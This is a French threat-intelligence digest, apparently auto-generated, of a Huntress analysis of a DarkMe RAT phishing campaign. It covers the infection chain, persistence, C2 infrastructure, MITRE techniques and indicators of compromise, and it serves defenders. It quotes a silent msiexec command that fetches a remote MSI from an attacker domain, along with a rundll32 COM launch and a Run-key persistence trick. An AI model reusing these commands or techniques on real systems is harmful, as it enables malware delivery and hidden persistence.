🔍 Contexte

Publié le 22 septembre 2026 par Huntress (James Northey et Andrew Brandt), cet article documente deux incidents distincts détectés le 31 août 2026 impliquant le malware DarkMe, un RAT/espion écrit en Visual Basic 6 (VB6) précédemment attribué au groupe APT Water Hydra (alias EvilNum / Operation DarkCasino).

🎯 Changement de vecteur d’accĂšs initial

Contrairement aux campagnes de 2023-2024 qui exploitaient deux zero-days (CVE-2023-38831 WinRAR et CVE-2024-21412 Windows Defender SmartScreen), cette nouvelle campagne repose exclusivement sur l’ingĂ©nierie sociale :

  • Un email de phishing contient un lien vers une URL apparemment anodine (readonline365[.]com/view/image.png)
  • Le serveur dĂ©livre un fichier image.pif (exĂ©cutable PE32+, 1 Mo) dĂ©guisĂ© en image
  • L’extension .pif (Program Information File, relique DOS) est exĂ©cutĂ©e directement par Windows

⚙ ChaĂźne d’infection dĂ©taillĂ©e

Étape 1 – Staging via msiexec :

  • Le .pif invoque msiexec /i https://onlineview365[.]com/propi.msi /quiet /norestart
  • Le MSI est construit avec exemsi MSI Wrapper sous le nom de couverture “PrinterFind Softwares”
  • Extraction d’une archive CAB vers %AppData%\ComponentsFolder\
  • ExĂ©cution du script prnfig.wsf (WSF/VBScript)

Étape 2 – Script de staging (prnfig.wsf) :

  • Copie tous les fichiers dans %AppData%\ComponentsFolder\
  • Copie clspack.exe (binaire Microsoft lĂ©gitime signĂ©) dans %AppData%\Microsoft\
  • GĂ©nĂšre filetext2.txt (template de registre pour enregistrement COM)
  • Lance : rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}

Étape 3 – Trois loaders VB6 en chaüne :

  • Coconout.dll (28 Ko) : loader COM stage 1, instanciĂ© par CLSID via /sta
  • Use.dll : stage 2, contient une gate anti-sandbox de 329 applications (wallets, terminaux de trading, jeux, utilitaires RGB) — si aucune n’est trouvĂ©e, l’exĂ©cution s’arrĂȘte
  • Finalized.dll (1,1 Mo) : stage 3, profile le systĂšme, dĂ©chiffre le payload company.cer et effectue le process hollowing dans clspack.exe

Étape 4 – DĂ©chiffrement du payload :

  • ClĂ© : Nobodygoingout
  • Routine RC4 cassĂ©e (swap manquant) → dĂ©gĂ©nĂšre en XOR single-byte 0x02 aprĂšs 7 octets
  • Les 7 premiers octets sont rĂ©ellement chiffrĂ©s (stub MZ/DOS header)
  • Hash correct du payload : 54ed18aa883b53794810be0428b3a0167758183c5b3ba5660af747dc81dd5b76

🔒 Persistance

Mécanisme en deux parties :

  1. Enregistrement d’un handler de protocole personnalisĂ© Locked:// sous HKCU\Software\Classes\Locked\shell\open\command → pointe vers rundll32.exe /sta {CFDC57BA-...}
  2. ClĂ© Run : explorer.exe "Locked://Newest" → masque le processus parent malveillant derriĂšre Explorer

🌐 Infrastructure C2

  • Domaine C2 : thatawful[.]boutique (dĂ©chiffrĂ© par RC4 avec la clĂ© onlywayhere23!$$#@!!35@!12)
  • IP C2 : 67.43.50[.]11:7712 (hĂ©bergĂ© via Voxility/ColoGuys Ă  Prague)
  • Le serveur expose RDP (3389), WinRM (5985, 47001), DCERPC (135)
  • Hostname Windows leaked via certificat TLS auto-signĂ© : WIN-78P55T5IL26
  • Redirection 302 vers effectivecpmnetwork[.]com sur les ports 80/443

📩 CapacitĂ©s du RAT DarkMe confirmĂ©es

  • Vol de wallets crypto (MetaMask, Ledger, Exodus, Trezor, Phantom)
  • Capture d’Ă©cran via GDI+
  • ÉnumĂ©ration antivirus via WMI (SELECT * FROM AntivirusProduct)
  • Manipulation de fichiers et exĂ©cution de commandes via canal TCP custom (wsock32)
  • Verbes C2 en espagnol/italien : SHLEXE, ZIPALO, COPALO, PASALO, DELMAP, STRFLS

đŸ—ïž Infrastructure de livraison

Cinq domaines de livraison identifiés via VirusTotal :

  • storageonline[.]me, readonline365[.]com, viewdocument[.]live, advancedfuturetechnology[.]com, sharedfuturetech[.]com
  • Hash unique du dropper : 394c93df... servi par 4 domaines simultanĂ©ment
  • sharedfuturetech[.]com hĂ©berge Ă©galement une campagne ClickFix distincte livrant un stealer dĂ©rivĂ© d’Efimer

📋 Type d’article

Analyse technique approfondie publiĂ©e par Huntress, documentant une nouvelle campagne DarkMe avec dĂ©composition complĂšte de la chaĂźne d’infection, des loaders, du mĂ©canisme de persistance, de l’infrastructure C2 et des IOCs associĂ©s.

🧠 TTPs et IOCs dĂ©tectĂ©s

Acteurs de menace

TTP

  • T1566.002 — Phishing: Spearphishing Link (Initial Access)
  • T1204.002 — User Execution: Malicious File (Execution)
  • T1218.007 — System Binary Proxy Execution: Msiexec (Defense Evasion)
  • T1218.011 — System Binary Proxy Execution: Rundll32 (Defense Evasion)
  • T1055.012 — Process Injection: Process Hollowing (Defense Evasion)
  • T1547.001 — Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (Persistence)
  • T1112 — Modify Registry (Defense Evasion)
  • T1027 — Obfuscated Files or Information (Defense Evasion)
  • T1140 — Deobfuscate/Decode Files or Information (Defense Evasion)
  • T1497.001 — Virtualization/Sandbox Evasion: System Checks (Defense Evasion)
  • T1071.001 — Application Layer Protocol: Web Protocols (Command and Control)
  • T1573.001 — Encrypted Channel: Symmetric Cryptography (Command and Control)
  • T1041 — Exfiltration Over C2 Channel (Exfiltration)
  • T1005 — Data from Local System (Collection)
  • T1113 — Screen Capture (Collection)
  • T1012 — Query Registry (Discovery)
  • T1057 — Process Discovery (Discovery)
  • T1518.001 — Software Discovery: Security Software Discovery (Discovery)
  • T1036.005 — Masquerading: Match Legitimate Name or Location (Defense Evasion)
  • T1559.001 — Inter-Process Communication: Component Object Model (Execution)

IOC

  • IPv4 : 67.43.50.11 — AbuseIPDB · VT · ThreatFox
  • Domaines : readonline365.com — VT · URLhaus · ThreatFox
  • Domaines : onlineview365.com — VT · URLhaus · ThreatFox
  • Domaines : thatawful.boutique — VT · URLhaus · ThreatFox
  • Domaines : storageonline.me — VT · URLhaus · ThreatFox
  • Domaines : viewdocument.live — VT · URLhaus · ThreatFox
  • Domaines : advancedfuturetechnology.com — VT · URLhaus · ThreatFox
  • Domaines : sharedfuturetech.com — VT · URLhaus · ThreatFox
  • Domaines : megchartedbk7.com — VT · URLhaus · ThreatFox
  • Domaines : effectivecpmnetwork.com — VT · URLhaus · ThreatFox
  • URLs : https://readonline365.com/view/image.png — URLhaus
  • URLs : https://onlineview365.com/propi.msi — URLhaus
  • SHA256 : 394c93dfbb7581c66a23c52b20cd90b31415c0825a2eab7107e60ee3fe693c04 — VT · MalwareBazaar
  • SHA256 : 9fb5888f9ac99227a35f3e08ca08bfb9eed676e1f91638599eba0d7a5aac847f — VT · MalwareBazaar
  • SHA256 : 1c923c685f97e556f241d0f1880283500a61dc7ecae8cafe75f34c720ff6b918 — VT · MalwareBazaar
  • SHA256 : 52b242047a8055c0936b384b952c1c16c1072a590610140b01f4acefa8ae883a — VT · MalwareBazaar
  • SHA256 : 4a18f65ab7de7be385cbcebc78c9ae49334294f93726822b8900f9b7a324a6b0 — VT · MalwareBazaar
  • SHA256 : 3052352ac811c48590f0239281312c35560fc06b4dc39790e365eb1e7cab8634 — VT · MalwareBazaar
  • SHA256 : d7185bd7b450b478c793ece3025bdd867eed70bb7b739a5f26375b5ba6cf0d93 — VT · MalwareBazaar
  • SHA256 : 54ed18aa883b53794810be0428b3a0167758183c5b3ba5660af747dc81dd5b76 — VT · MalwareBazaar
  • SHA256 : 2915efecf2a01ce0b3ef49c47666ec43c326e7804df10e5859db5f08eeca8a37 — VT · MalwareBazaar
  • CVEs : CVE-2023-38831 — NVD · CIRCL
  • CVEs : CVE-2024-21412 — NVD · CIRCL
  • Fichiers : image.pif
  • Fichiers : propi.msi
  • Fichiers : prnfig.wsf
  • Fichiers : filetext.txt
  • Fichiers : filetext2.txt
  • Fichiers : Coconout.dll
  • Fichiers : Use.dll
  • Fichiers : Finalized.dll
  • Fichiers : company.cer
  • Fichiers : clspack.exe
  • Fichiers : clspack.exe
  • Chemins : %AppData%\ComponentsFolder\
  • Chemins : %AppData%\Microsoft\clspack.exe
  • Chemins : %AppData%\ComponentsFolder\Coconout.dll
  • Chemins : %AppData%\ComponentsFolder\company.cer
  • Chemins : %TEMP%\Zeta_Component.log

⚠ À propos de ces IOC — ils sont extraits automatiquement de l’article original le 25 septembre 2026 et n’ont pas fait l’objet d’une vĂ©rification externe. Un indicateur peut avoir Ă©tĂ© rĂ©attribuĂ© depuis : une IP de C2 peut redevenir un service lĂ©gitime, un domaine sinkholĂ© peut changer de propriĂ©taire. Aucune garantie d’exactitude ni d’actualitĂ© — contrĂŽlez leur validitĂ© avant tout usage opĂ©rationnel, en particulier avant de les injecter dans une blocklist ou un SIEM.

Malware / Outils

  • DarkMe (rat)
  • exemsi MSI Wrapper (tool)

🟱 Indice de vĂ©rification factuelle : 100/100 (haute)

  • ✅ huntress.com — source reconnue (liste interne) (20pts)
  • ✅ 39569 chars — texte complet (fulltext extrait) (15pts)
  • ✅ 39 IOCs dont des hashes (15pts)
  • ✅ 7/9 IOCs confirmĂ©s (AbuseIPDB, MalwareBazaar, ThreatFox, URLhaus, VirusTotal) (15pts)
  • ✅ 20 TTPs MITRE identifiĂ©es (15pts)
  • ✅ date extraite du HTML source (10pts)
  • ✅ acteur(s) identifiĂ©(s) : Water Hydra, EvilNum (5pts)
  • ✅ 2/2 CVE(s) confirmĂ©e(s) (CIRCL) (5pts)

IOCs confirmés externellement :

  • 67.43.50.11 (ip) → VT (7/91 dĂ©tections)
  • 394c93dfbb7581c6
 (sha256) → VT (14/76 dĂ©tections)
  • 9fb5888f9ac99227
 (sha256) → VT (12/76 dĂ©tections)
  • 1c923c685f97e556
 (sha256) → VT (5/76 dĂ©tections)
  • readonline365.com (domain) → VT (5/91 dĂ©tections)

🔗 Source originale : https://www.huntress.com/blog/darkme-rat-abandons-exploits